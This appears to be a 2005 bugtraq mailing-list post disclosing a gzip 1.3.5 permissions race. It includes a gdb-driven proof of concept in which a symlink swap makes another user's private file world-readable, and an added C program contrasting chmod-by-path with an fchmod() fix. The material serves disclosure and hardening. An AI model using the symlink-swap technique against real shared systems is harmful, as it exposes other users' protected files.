Date: Wed, 13 Apr 2005 11:40:49 -0400
From: Joey Hess <joeyh@...ian.org>
To: Martin Pitt <martin.pitt@...onical.com>
Cc: Imran Ghory <imranghory@...il.com>, bugtraq@...urityfocus.com,
	303927@...s.debian.org
Subject: Re: gzip TOCTOU file-permissions vulnerability

Martin Pitt wrote:
> Of course the file can be removed by other users after gunzip has
> finished, but that is not a gzip bug, but the result of the really
> dumb idea to have a group/world-writeable directory without the sticky
> bit.

It may be really dumb, but it's pretty common practice too.
Group-writable directories are often made setgid but I've never seen one
made sticky. There's probably a lot of documentation that presents this
as best practice if you trust your group members with access to files in
the directory, and likely none of it mentions this kind of security issue.

Just a few examples within the Debian project (since this is CCed to the
Debian bts):

joeyh@...dn:/var/lib/gforge/chroot/home/groups/d-i/htdocs>ls -ld .
drwxrwsr-x    4 dummy    d-i          4096 Jan 18 12:51 ./

joeyh@...ck:/org/cdimage.debian.org/www>ls -ld .
drwxrwsr-x    4 manty    debian-c     4096 Apr  7 09:11 ./

joeyh@...kel:/org/bugs.debian.org/spool>ls -ld .
drwxrwsr-x    4 debbugs  debbugs      4096 Apr 13 09:19 ./

(gzip is not typically run in any of these directories AFAIK, FWIW).

> Maybe I understood you wrong, could you please give a small test case
> which describes the vulnerability exactly?

I'm a wimp, so I will use gdb instead of writing some real exploit to
win the race.

joey@...gon:~/tmp/gzip-1.3.5>chmod 777 .  
joey@...gon:~/tmp/gzip-1.3.5>echo secret > ~/secret
joey@...gon:~/tmp/gzip-1.3.5>chmod 400 ~/secret
joey@...gon:~/tmp/gzip-1.3.5>ls -l ~/secret 
-r--------  1 joey joey 7 Apr 13 11:32 /home/joey/secret
joey@...gon:~/tmp/gzip-1.3.5>gdb ./gzip
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b copy_stat
Breakpoint 1 at 0x804ca19: file gzip.c, line 1725.
(gdb) run -9 COPYING
Starting program: /home/joey/tmp/gzip-1.3.5/gzip -9 COPYING

Breakpoint 1, copy_stat (ifstat=0x0) at gzip.c:1725
1725        if (decompress && time_stamp != 0 && ifstat->st_mtime != time_stamp) {
(gdb) 
zsh: suspended  gdb ./gzip
joey@...gon:~/tmp/gzip-1.3.5>ls -l COPYING.gz
-rw-------  1 joey joey 6853 Apr 13 11:28 COPYING.gz
joey@...gon:~/tmp/gzip-1.3.5>sudo su nobody
Password:
sh-3.00$ ln -s ~joey/secret COPYING.gz
sh-3.00$ cat COPYING.gz
cat: COPYING.gz: Permission denied
dragon% 
zsh: exit 1     sudo su nobody
joey@...gon:~/tmp/gzip-1.3.5>fg
[2]  - continued  gdb ./gzip
c
Continuing.

Program exited normally.
(gdb) quit
joey@...gon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r--r--r--  1 joey joey 7 Jan 12  1999 /home/joey/secret

-- 
see shy jo
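
The race Joey wins with a gdb breakpoint above comes from gzip 1.3.5 applying the input file's permissions to the output by name (`chmod(ofname, ...)` in `copy_stat`) after the output has been created, so a symlink swapped in between is followed. The following C program is an added example, not gzip's own code and not part of the original post: it reproduces that order of operations in a throwaway directory under `/tmp` (an assumption about the host), performs the symlink swap in-process instead of from a second user's shell, and contrasts it with the `fchmod()`-on-the-descriptor form that a fix needs. The file names `COPYING.gz` and `secret`, the `0644` mode standing in for the input file's mode, and the helper names are all illustrative.

```c
/* Added example: chmod-by-path (the gzip 1.3.5 copy_stat() ordering)
 * versus fchmod() on the output descriptor. Not gzip's code. */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* The attacker's move: replace the just-written output file with a
 * symlink to the victim's private file. Done here by the same process,
 * standing in for the "sudo su nobody; ln -s" step in the post. */
static int swap_in_symlink(const char *out, const char *target)
{
    if (unlink(out) != 0)
        return -1;
    return symlink(target, out);
}

/* Vulnerable ordering: create, write, close, then set the mode by NAME.
 * chmod() follows symlinks, so the mode lands on whatever `out` points
 * to at that moment. */
static int write_then_chmod_by_path(const char *out, const char *target,
                                    mode_t mode)
{
    int fd = open(out, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    if (write(fd, "data\n", 5) != 5) { close(fd); return -1; }
    close(fd);
    if (swap_in_symlink(out, target) != 0)   /* the race window */
        return -1;
    return chmod(out, mode);
}

/* Hardened ordering: keep the descriptor and use fchmod(). The mode is
 * applied to the inode we created, regardless of what the name now
 * resolves to; the symlink swap changes nothing. */
static int write_then_fchmod(const char *out, const char *target,
                             mode_t mode)
{
    int fd = open(out, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    if (write(fd, "data\n", 5) != 5) { close(fd); return -1; }
    if (swap_in_symlink(out, target) != 0) { close(fd); return -1; }
    int rc = fchmod(fd, mode);
    close(fd);
    return rc;
}

/* Set up a fresh directory with a mode-0400 "secret" (constructed test
 * fixture), run one of the writers against it, and report the secret's
 * permission bits afterwards. Returns -1 if setup fails. */
static int secret_mode_after(int (*writer)(const char *, const char *, mode_t))
{
    char dir[] = "/tmp/gzip-toctou-XXXXXX";   /* assumes writable /tmp */
    char secret[256], out[256];
    struct stat st;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(out, sizeof out, "%s/COPYING.gz", dir);

    int fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0400);
    if (fd < 0)
        return -1;
    close(fd);

    writer(out, secret, 0644);               /* 0644: the input's mode */

    if (stat(secret, &st) != 0)
        return -1;
    unlink(out);
    unlink(secret);
    rmdir(dir);
    return (int)(st.st_mode & 07777);
}

int main(void)
{
    printf("chmod() by path : secret is now %04o\n",
           secret_mode_after(write_then_chmod_by_path));
    printf("fchmod() on fd  : secret is now %04o\n",
           secret_mode_after(write_then_fchmod));
    return 0;
}
```

The same reasoning applies to the `chown()` and `utime()` calls that follow the `chmod()` in `copy_stat`: anything done by path after the output has been created is exposed to the swap, so a fix keeps the descriptor open and uses the `f*` variants, or at least refuses to operate on a path that no longer refers to a regular file owned by the caller.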
